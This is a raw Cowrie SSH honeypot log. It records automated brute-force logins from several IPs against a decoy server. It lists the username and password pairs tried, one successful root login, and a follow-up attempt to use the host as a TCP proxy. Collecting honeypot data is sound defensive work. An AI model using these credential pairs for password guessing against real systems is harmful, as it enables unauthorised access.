{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:21.773007Z","src_ip":"83.168.105.65","session":"fa92b12f8a92"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:21.782039Z","src_ip":"212.227.125.160","session":"158346f078ba"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:21.882626Z","src_ip":"83.168.105.65","session":"fa92b12f8a92"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:22.921497Z","src_ip":"83.168.105.65","session":"fa92b12f8a92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54988,"dst_ip":"1.2.3.4","dst_port":22,"session":"c092486ec5ff","protocol":"ssh","message":"New connection: 212.227.125.160:54988 (1.2.3.4:22) [session: c092486ec5ff]","sensor":"my-vps","timestamp":"2025-08-26T11:40:26.485119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:26.565918Z","src_ip":"212.227.125.160","session":"c092486ec5ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:26.566821Z","src_ip":"212.227.125.160","session":"c092486ec5ff"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:26.953687Z","src_ip":"212.227.125.160","session":"c092486ec5ff"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:28.007103Z","src_ip":"212.227.125.160","session":"c092486ec5ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55766,"dst_ip":"1.2.3.4","dst_port":22,"session":"fce179969403","protocol":"ssh","message":"New connection: 212.227.125.160:55766 (1.2.3.4:22) [session: fce179969403]","sensor":"my-vps","timestamp":"2025-08-26T11:40:32.242499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:32.243503Z","src_ip":"212.227.125.160","session":"fce179969403"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:32.293517Z","src_ip":"212.227.125.160","session":"fce179969403"}
{"eventid":"cowrie.login.failed","username":"sem6","password":"sem6","message":"login attempt [sem6/sem6] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:32.503922Z","src_ip":"212.227.125.160","session":"fce179969403"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:33.556287Z","src_ip":"212.227.125.160","session":"fce179969403"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50022,"dst_ip":"1.2.3.4","dst_port":22,"session":"6085b2d02649","protocol":"ssh","message":"New connection: 83.168.105.65:50022 (1.2.3.4:22) [session: 6085b2d02649]","sensor":"my-vps","timestamp":"2025-08-26T11:40:36.999768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.002423Z","src_ip":"83.168.105.65","session":"6085b2d02649"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.039832Z","src_ip":"83.168.105.65","session":"6085b2d02649"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.152388Z","src_ip":"83.168.105.65","session":"6085b2d02649"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53955,"dst_ip":"1.2.3.4","dst_port":22,"session":"b721566ab507","protocol":"ssh","message":"New connection: 213.209.150.239:53955 (1.2.3.4:22) [session: b721566ab507]","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.600088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.601085Z","src_ip":"213.209.150.239","session":"b721566ab507"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.657597Z","src_ip":"213.209.150.239","session":"b721566ab507"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.940333Z","src_ip":"213.209.150.239","session":"b721566ab507"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4107,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4107","sensor":"my-vps","timestamp":"2025-08-26T11:40:37.997867Z","session":"b721566ab507"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56536,"dst_ip":"1.2.3.4","dst_port":22,"session":"372566c21545","protocol":"ssh","message":"New connection: 212.227.125.160:56536 (1.2.3.4:22) [session: 372566c21545]","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.051165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.052150Z","src_ip":"212.227.125.160","session":"372566c21545"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.054449Z","src_ip":"213.209.150.239","session":"b721566ab507"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.105363Z","src_ip":"212.227.125.160","session":"372566c21545"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.190990Z","src_ip":"83.168.105.65","session":"6085b2d02649"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21306,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21306","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.210557Z","session":"b721566ab507"}
{"eventid":"cowrie.login.failed","username":"niaoyun","password":"123456","message":"login attempt [niaoyun/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.258468Z","src_ip":"212.227.125.160","session":"372566c21545"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.267123Z","src_ip":"213.209.150.239","session":"b721566ab507"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:38.324574Z","src_ip":"213.209.150.239","session":"b721566ab507"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:39.524984Z","src_ip":"212.227.125.160","session":"372566c21545"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57306,"dst_ip":"1.2.3.4","dst_port":22,"session":"3308e6b7c9e4","protocol":"ssh","message":"New connection: 212.227.125.160:57306 (1.2.3.4:22) [session: 3308e6b7c9e4]","sensor":"my-vps","timestamp":"2025-08-26T11:40:44.023905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:44.025142Z","src_ip":"212.227.125.160","session":"3308e6b7c9e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:44.073437Z","src_ip":"212.227.125.160","session":"3308e6b7c9e4"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:44.283641Z","src_ip":"212.227.125.160","session":"3308e6b7c9e4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:45.336083Z","src_ip":"212.227.125.160","session":"3308e6b7c9e4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37228,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b26152a86c0","protocol":"ssh","message":"New connection: 196.251.86.249:37228 (1.2.3.4:22) [session: 9b26152a86c0]","sensor":"my-vps","timestamp":"2025-08-26T11:40:45.521478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:46.228231Z","src_ip":"196.251.86.249","session":"9b26152a86c0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:40:46.229172Z","src_ip":"196.251.86.249","session":"9b26152a86c0"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:48.835263Z","src_ip":"196.251.86.249","session":"9b26152a86c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58072,"dst_ip":"1.2.3.4","dst_port":22,"session":"a895c350fce5","protocol":"ssh","message":"New connection: 212.227.125.160:58072 (1.2.3.4:22) [session: a895c350fce5]","sensor":"my-vps","timestamp":"2025-08-26T11:40:49.999640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:50.034066Z","src_ip":"212.227.125.160","session":"a895c350fce5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:50.074602Z","src_ip":"212.227.125.160","session":"a895c350fce5"}
{"eventid":"cowrie.login.failed","username":"cp_postgres","password":"cp_postgres","message":"login attempt [cp_postgres/cp_postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:50.259715Z","src_ip":"212.227.125.160","session":"a895c350fce5"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:50.397108Z","src_ip":"196.251.86.249","session":"9b26152a86c0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:51.331538Z","src_ip":"212.227.125.160","session":"a895c350fce5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50332,"dst_ip":"1.2.3.4","dst_port":22,"session":"23af993d4ce6","protocol":"ssh","message":"New connection: 83.168.105.65:50332 (1.2.3.4:22) [session: 23af993d4ce6]","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.346984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.355323Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
